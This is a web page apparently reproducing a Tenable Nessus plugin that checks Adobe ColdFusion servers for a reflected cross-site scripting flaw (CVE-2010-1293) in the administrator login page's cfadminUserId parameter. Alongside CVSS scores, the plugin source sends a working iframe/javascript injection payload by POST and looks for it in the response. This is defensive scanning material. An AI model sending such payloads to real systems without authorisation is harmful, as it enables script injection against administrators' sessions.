Lucene search

K
nessusThis script is Copyright (C) 2010-2021 Tenable Network Security, Inc.COLDFUSION_CFADMINUSERID_XSS.NASL
HistoryMay 24, 2010 - 12:00 a.m.

Adobe ColdFusion 'cfadminUserId' XSS (APSB10-11)

2010-05-2400:00:00
This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.
www.tenable.com
25

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS

0.079

Percentile

94.4%

The version of Adobe ColdFusion running on the remote host is affected by a cross-site scripting vulnerability in the administrative web interface. Input to the ‘cfadminUserId’ parameter of ‘/CFIDE/administrator/login.cfm’ is not properly sanitized. This vulnerability is present when the ‘Separate user name and password authentication’ configuration setting is enabled.

This version of ColdFusion is reportedly affected by additional vulnerabilities, although Nessus has not checked for those issues.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(46705);
  script_version("1.19");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2010-1293");
  script_bugtraq_id(40073);
  script_xref(name:"Secunia", value:"39790");

  script_name(english:"Adobe ColdFusion 'cfadminUserId' XSS (APSB10-11)");
  script_summary(english:"Attempts a non-persistent xss.");

  script_set_attribute(attribute:"synopsis", value:
"A web application running on the remote host is affected by a
cross-site scripting vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of Adobe ColdFusion running on the remote host is affected
by a cross-site scripting vulnerability in the administrative web
interface. Input to the 'cfadminUserId' parameter of
'/CFIDE/administrator/login.cfm' is not properly sanitized. This
vulnerability is present when the 'Separate user name and password
authentication' configuration setting is enabled.

This version of ColdFusion is reportedly affected by additional
vulnerabilities, although Nessus has not checked for those issues.");
  script_set_attribute(attribute:"see_also", value:"https://www.adobe.com/support/security/bulletins/apsb10-11.html");
  script_set_attribute(attribute:"solution", value:"Apply the hotfix referenced in Adobe's advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/05/11");
  script_set_attribute(attribute:"patch_publication_date", value:"2010/05/11");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/05/24");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:coldfusion");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.");

  script_dependencies("coldfusion_detect.nasl");
  script_require_ports("Services/www", 80, 8500);
  script_require_keys("installed_sw/ColdFusion");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("install_func.inc");

app = 'ColdFusion';
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80);

install = get_single_install(
  app_name : app,
  port     : port
);

dir = install['path'];
install_url = build_url(port:port, qs:dir);

url = dir + '/administrator/login.cfm';

xss = '"><iframe src="javascript:alert(\''+SCRIPT_NAME+'-'+unixtime()+'\')';
expected_output = 'value="'+xss;
data = 'cfadminUserId='+xss;

res = http_send_recv3(
  method : "POST",
  port   : port,
  item   : url,
  data   : data,
  content_type : 'application/x-www-form-urlencoded',
  exit_on_fail : TRUE
);

if (expected_output >< res[2])
{
  output = strstr(res[2], expected_output);
  if (empty_or_null(output)) output = res[2];

  security_report_v4(
    port       : port,
    severity   : SECURITY_WARNING,
    generic    : TRUE,
    line_limit : 5,
    xss        : TRUE,
    request    : make_list(http_last_sent_request()),
    output     : chomp(output)
  );
  exit(0);
}
else
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS

0.079

Percentile

94.4%

Related for COLDFUSION_CFADMINUSERID_XSS.NASL